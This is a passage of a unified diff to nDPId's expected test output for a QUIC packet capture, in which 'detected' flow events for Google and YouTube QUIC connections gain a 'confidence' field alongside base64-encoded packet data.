LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLWZvbnRzLmdzdGF0aWMuY29tUTAyNXsm6efkXHH\/AeiBYJKSGuhkAAAAQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQAAAAAWDUwOQAAEAAeAAAAAQAAAEZJWEQ2AwEAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00726{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 01475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463060980358,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":816,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":816,"pkt_l4_len":782,"ts_msec":1463060980358,"pkt":"8IQvSpdgeJKcD6iOCABFAAMieqxAAEART+TAqAFp2DrS7oaGAbsDDnUSDaSWOQdzcSypUTAyNQKic+J8GjVsfJMsdsljddNYUoaFl0z7yC+b\/wr4VU+uLim9cSDoCfQ+BQHWf7axGI\/0otFRZnw6Kt8qBdaHMLIkdKcN8wdByZN\/oxJ5hHJiGBr5fiEEYQesGjd7ktKww8RLAeoDPzO5xHVx6UhHPdcfqLCO0OUirBVeLWv0B2O9yzbQVc1VH+bmliqhUEJvrnRG4cr78AW8g3wScWC4rwYpeJVk\/IAAQQ57Dki1DMwjrpTDHht\/5ZKfx0L6ARDMsMT4o5zF\/akZnbDa0ujEPexxAMZmDGeFTAQkCIMwA\/gA3J1r7aP1KpIssFW81KVjJ5iXRD5YwhMXjujhZlTD7FpkokyBosoiaYQ9OlBELgrsv\/9qDO2wxdYuRfMHHiN5v5dCIbRSeNjSHrD5k38mY1aUywqkMP+2CUbD2epWgY5pAU9yj7pwB44jlPLOPZlRDlPzYteeLN3w3AP\/lAuGaox0e\/nN6hJNNlHNcIQxZHPP2S1Nn2pwslhn\/VZ\/sLfiYbgNEJ7jii0Xgsq+CMf0fQRIuCSQdHqU2jrdN+ANDhT5dE3khD4eoPHs8vCv4BKfMl7gejkwwAW2mHRMOqa7T9bOfmL\/xQjsgJk39nF1RjCMAK12Xi+dtOGE9IgQxbz9zSmgmL2yfIbOnXdI+bTM22zfHQn6FUtzcayZDzqJ6V1SbCofsr53iOUBUvhiUNinYAVziLfoiiMvfHEE5p0lanDdKZb0YpgPqdNQd16jKwJjqhYbmKL4sSrdZfI7oqtHDzJwMafbASoNSGD3Uv4mKwYKsjq2Gt5i5gDh3DTXlk8HfNKd3wJG6rjWcXbXKzMhv54KIsq1aZ1I4i1ag8lQ0v10wAGcat1qElIOAsfiTGWepgC8HR8kDowOKSvfud74VVvyn31uOyJudA\/cCGuSQ\/d7qs9IBWEXiAAAuMK7hXoYMc\/2wJckDypsBIy3x5hskbJa1d0Ahy9jqEdMlnrF69g47VNiGR6icm7nProfol9M2gJRYOL9DgN\/"}
 02256{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463060980361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980361,"pkt":"eJKcD6iO8IQvSpdgCABFAAViEvYAADMR8Kas2RAEwKgBaQG7smUFTookAAGQybRh4NjU1uL582WDWYRD2dtjLe0ntuD1Rv2\/b2fKGeJD6xTTVAUMsP2lDwoVXXJwitAjM1Ss3TeNIyNiPaVEHvBHWgnmTCyfAFo80jSe0xJw6Ybz6w3BHKed9Mf4LC34oG\/VIDlHTxzV6KkXcvqfJ+U14RSVhKW3KAUcxQl5Qnl+FE6bIGsShbMSV6P+UWlpqynVxRJTYzRSpGWAchBBRlF7EhFWsrYnblyXrD3VTjEqg879fRXYm2D6G+l3V3l4hCc8odvANTzc501Sej7x6oDCtVRndJ56LpiERNpHUkSjmM00+Wy1dbMT\/Vm99GrTmWmQ58Bhd7+x\/sycdH8p6kPEaBRymR3LuujKz\/Gp3cYG3YCBKEJqKQbhAu5X3FQ9PXBc+M62o93W9PU8b6NIWgn7PPkt\/looi8HdoxE9N0Q1KeX\/DgvtM+nwxVmrskJK6Thzut4c\/pKoeIdgzgc3\/jHyNkNEOaEuYipEhpS0\/Q+tOI16w+YZPxlDlM2uXgEDMcZKpZ3i643hutLioOhndNrgTa+7hlc5d+9fBUPIG4kEo\/3qe\/1sIW96DdumLgeq7hN8q9ipK\/OYJXgatYkOUytQ0BidBbi0s1rXKIV0\/20SDyn2cTxo7WHBdcfDH2uOAi\/TCrRfDAaRNQYOzMWy\/oZuiEP4GWby88PrtsqP7zlBhlOROw4HDIjA48YJ3izoMulzCHWEfBSraR6GRvLlvTobSdvt\/z+UVvoGEaNUxGfD3NV\/ys6k8iURbaIUpy8FqGPXqO5y1+eef+JbMhHxVscn06dBggRMWGOOEqj0iilT1RKBH9sFsvyyAlIRcyu73\/dSHY+X7jFjSREVA2KvZo6yurWHJdfQmRknszSHCEHvhyALYDYo7SRCnZFDn5E9W3gfJx9JMvRGkKHXuxSF3xLvoY5nZEGBaR+XmmVlyrTJABRhDpbAmZ5n4r9hBYxhQHxcHxiGFFAZf8z0g25Mt1TpS14HKgYd19UYag4E9v9SK0NipYTC9fTFM1QGWJgR0BKWBdAxjVtOeAxGYzbRhH6dsuYtciI4zHHsc2k8CUrpT7INwMysA9v0qD2r5uYmQ8cWNQI093fnUkc1ZiLc0jIwKw1r5S6aXpzTXj770vHeucOObKGH\/cu1fclnWip+hpVKiVNyqyTuHufVLPShgYbyGVCuWpZPLDtm2Jgl78SGXcMPJqMT\/eMThOsXIuSLcIkh41PVNQKxF5sBj\/BOj5ESvnmDK6QkupJ4WgD36Qg55pRhbyhTXn3wlt2Wr\/yvzjY+U2Y7nfQG6dNeCf\/ZR4o941mW0nR93XyOa+USW4ElVSAKkaXcwrIvcK8SdED4dYTXRprenIgGMn8eEVkFhh5c+SVUq+XERE8IzY1QaFHpJZP8fwhzTmsejKR4iNGy5hDCfipCmLS34n3Ti+BCtXRamD+5SfxUJJlOaGuDx1ZxsJ+DRIsQP+0kLMojxKXXv8fxv+kjUQYTnOJebQGi1vj1CqRIxf5a70YpuiubpyNGMG3LRDDgT1bz3u8MXCO6UUeWAw7iQ0bpGgmPr47zuIVkRhe2cIWsbNBRCq+DfTxqyI5xdGH+ZdSvdGdcCnw7eeyZKURtoMVPU9ujTUcxOz5LcEN\/TxALvQe7jb0VWnhZrurBM\/tZX7uY\/NVzfAVeTgxdzrV78G5uYYEagOMAWzfqvOVOd0DJVYOhYStQVf878CnlBQP9yq8zVHiaudHd7jYBpAflemve6zr2sCq3IlfpR3vKBjLqbY7vKTWflGz9T6iOy4tB+9SN2sXj4A2cmfb4"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463060980364,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980364,"pkt":"8IQvSpdgeJKcD6iOCABFAAViJrhAAEARqpjAqAFp2DrJ7tp+AbsFTrs0DdvEpLUMteNnUTAyNQF\/L3UOAoUxuEbp+7YBoAEABENITE8XAAAAUEFEAFcBAABTTkkAYgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zLnl0aW1nLmNvbbTKJy3aOx+44evN5g4\/bhdbtR7MQzwZCntatSQ+G8ewpnq2IX6bmQGJ6u0gPE\/alKxhVCh5gNqzZa48ANz\/fzn8t\/OZMVjaOBqhnSl8gs5MAKWKvx2rs4aeJgBO0M1ar5HmEtqD1e+f9L6rfh+tUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0S2TVLqHgVarrziXF9vRgZfRbyyeop0hCtvyBkGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjSnz1A5VQjBXngqx54WDpGpAAAAAFg1MDkAABAAHgAAAAEtDDoRyfLDyY7FDWPOtGGCrqeP59Ev12tUbO63fzUkAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrhREBANWx00HuRXMG0vkL7viDDbkIpOBViFNO6g+NNdysNjd851pEDUZpbHOuJYtW0iX4hBg5fY5j3AROZ3LGqn4GtUunxLSKIjTGQCqElPyRHXp8aZanMkwEPAt6EM7grDPd5Xwii1XuJA6M67q0oAq4SWvvMG1sUGL2sjhrCJT2dHXvhq+Y03p2EXtsBsu4SwWblRpFN82TNjK4JK6xcJx5X0VS7I5kAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1463060980377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"ts_msec":1463060980377,"pkt":"eJKcD6iO8IQvSpdgCABFAABtTPkAADMRu5ms2RADwKgBaQG7ng0AWd\/uADd2O2oBZL+pVdP7tzva+fHvZhkEEtFfk705wPfWHPtzaQLZxSHnInASbTD2097V+S960VCK+SG68+SzP6VbXn8\/e\/F4Y7OlxWw39RE6om32"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463060980378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980378,"pkt":"8IQvSpdgeJKcD6iOCABFAAViJXJAAEARouvAqAFp2DrS4dI5AbsFTmmUDQ+yIGZd4AviUTAyNQGAeAVQdnPN3KBdghsAoAEABENITE8XAAAAUEFEAFMBAABTTkkAYAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXl0My5nZ3BodC5jb23Qhl3t4O7jCNI4\/86cd6fedmETl+HX+i21qzSEiNb4OJfB1Z4x91CByMieITzxdi32+v4DBxDEfj4iCcg46VL\/PH8fxOKMEzAFEjMjm3TRFNLXbtT6qGv6iFQOxYDkzP0ABTP7FYiXHH9noNffRk12UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn02TPR2k9zoZDH1PYmCZf2Zt1J713FQWCpFni4GGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQlEdwQCcHdE7bz3Yek8lX\/AAAAAFg1MDkAABAAHgAAAHebYWUW7CksegbNUHmoS00JCUhXrcp5peVS86L6lokeAQAAAEMyNTVGSVhEYnkO9pznNwziYxqCfXGFX0ALe5CprnnrLQMBAMirDAfWX8CjXhckfelJ8XlBmAh34iT31gIDz8lnlm4Q\/bpdZ31E6\/Xb4Zw1dQ4d56j0Eolero2q9ipFB5AjgjU5le2N8ZGkm7r3g24DXoIf95dR23D5dPhHt4gzaLbSHu3jXT7dZ4nC9v+kOJu9q4K2bd+Xl47r9Vjbe0PzK8JTkSpeZDmRHU3bz95Toi6T6fqfvQJWfNqRdNdObQaDdl8+eoJfAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00718{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1463060980388,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1463060980388,"pkt":"8IQvSpdgeJKcD6iOCABFAABBHBJAAEARn6vAqAFprNkQBLJlAbsALZ9GDEPl1BjSnP0KAohkBW4mjqf+lWrwMPohYA0CsIfpCV\/yUKbgEg=="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463060980404,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1463060980404,"pkt":"8IQvSpdgeJKcD6iOCABFAABBthxAAEARBaLAqAFprNkQA54NAbsALeHSDKM2rKXAEd7wI3gnMNVg\/Bju+TzyuAKq97AJFlbG89vA9kIRtA=="}
 02250{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1463060980407,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980407,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi+XIAADIRHN7YOtLuwKgBaQG7hoYFTgeIDKSWOQdzcSypAcCvMwGYTq6shxzW1ACAAVJFSgAGAAAAU1RLAHIAAABTTk8AqgAAAFBST0bxAAAAU0NGR4QBAABSUkVKiAEAAENSVP9UBQAA1qWbZaKGGMNu4n0IFd5qvoUTzfScMrQM62F5Klyoy\/gr13Knz1tigfd0ZqNrTwQKxsh0E3PeOsScdXLYKjs8qyiEuOy1a7C4zg63fuUtHJYgH7qkJ5NPVCX92UrREjVCY9dWARG+L7cbZT7AgaahFE1+Dc9xqUra0W3ZNGbmcka6SHMYwJHMeW3B7eVH3uELXrdKJ+QLpbj4b09tDQ\/XNJTmasaKcqcHQQkwRQIgPMYj0Pf7PCP2uxgZgQXPwKb2tHTcOJUmmbK8MQNIgfsCIQDeu6cth5DDb1874iP6IpBL709rtt3G3ayeVYw33VYBN1NDRkcHAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAUFVCUz8AAABLRVhTQwAAAE9CSVRLAAAARVhQWVMAAABBRVNHQ0MyMO4xNazIxw51CPh92NozyjFDSElEIAAArqfGpWlX\/ID+ijs5XuaY5l76DioG\/jdi0YAeXXF\/CmtDMjU1eOLS2hoopbZAEzdXAAAAAA0AAAABAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzOzGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQpo6mgbqB6gLlBYqE\/JODrSszjftYydWvQWHrJl8LaGcoCDtX+zF57w+1k7kVtnVpynvVDocqpnI0GGrun+excBbbk\/WtwdM1pruv4DC9rbrjjuzUh5nbWX\/pvc8t5nyiovfjwmtmI4UJXPKZTu5BF9\/Zcy1\/ucu1+fj1my\/1QiLLjwa6eC40ny7X1+yaMeXv6+AnN8+Hscy0b3aWiM\/4f24pi0LZ9UUc95\/XzHjyptDwc\/Gl7CxFnY+ZRZOXZM9a4Our\/25u"}
@@ -44,20 +44,20 @@
 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463060980446,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JoAADERM7bYOsnuwKgBaQG72n4FTiSvDNvEpLUMteNnAaUNyY55Ftxcp3QgTgCAAVJFSgAGAAAAU1RLAHAAAABTTk8AqAAAAFBST0bvAAAAU0NGR4IBAABSUkVKhgEAAENSVP9SBQAAJy7nP96y9QV42MKrzfRCPLT87WDRH7Fd5bV2IYJV5uerSuKcuz27mxBT4+gnyC4BMUrik01sKIil0iRgGwZXZriX2eqvjy0wvoZPR2mR64H2U8+GZaQSd+4vVoONHW5kMsgcr5Q\/br7AM9doxRgjn+8O22aMyRRKIbkIgECxfZ+3gPhZwCGzY3E1Vh0YGcUrXggtX0cSYrBSP4FN90wRk2Ud5VnIkrPbMEUCIQD6BAJQX5LoIPZW+skklsA6cQo9kEO8kehkPXFxP3LI1QIgI\/gkfWgDPoL5UerIs+RuGzTUGbty897xHCg0JJUpIv9TQ0ZHBwAAAEFFQUQIAAAAU0NJRBgAAABQRE1EHAAAAFBVQlM\/AAAAS0VYU0MAAABPQklUSwAAAEVYUFlTAAAAQUVTR0NDMjCzHyexPo2T9WCZD4U6m8alQ0hJRCAAAN5dryiyxa3rgUlMMcjfu+Bv+FmXvUMT6V4zrZRMsB8LQzI1NSKpyEIGkw80gGo2VwAAAAANAAAAAQMB6IFgkpIa6AMAAAADeybp5+Rccf8AAAAAAP8GAAB4u3NQLcT7zcYALLnYvhs0sd6HtOE4nNjWrVn\/dtpH9IYcFRtZoMLADJiHTID5BdaeMzA3MjewMLYEdaLSsFrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/Egu0vUQBjsLh4eLWCYgoTBkRsJFGYH+vGcLbD5wQFmMDOyMzsxsLxfdX3TDU9lHdWuzJUpXnVZcm2mTlvyE9uXmK6vKlKezi5qt92BwfbXEX6W+Kzp9q32MjOWzpfcaXXqbhovy4mLB6YvbmLpN2hi6SZUgDUxg\/sIgixNzK5AjmMTigObeLX0EvNSivIzwQ2eJjEgt6AgNS89My8VWZmQll5yTn5pCrKYGMwg3cS8xJzKkszkYrA4N8KCRGROThMfktV6mXmo\/KwCVH5pdhM\/slP1EovQBUrRBJLQVSTnownkVqAJlKBrKctDcnNKKhIntRiJk1aExMkoReJkliBx8nKQOAUonBJQoEI4iSnAIgASeHDHQETymkRgAkDZ3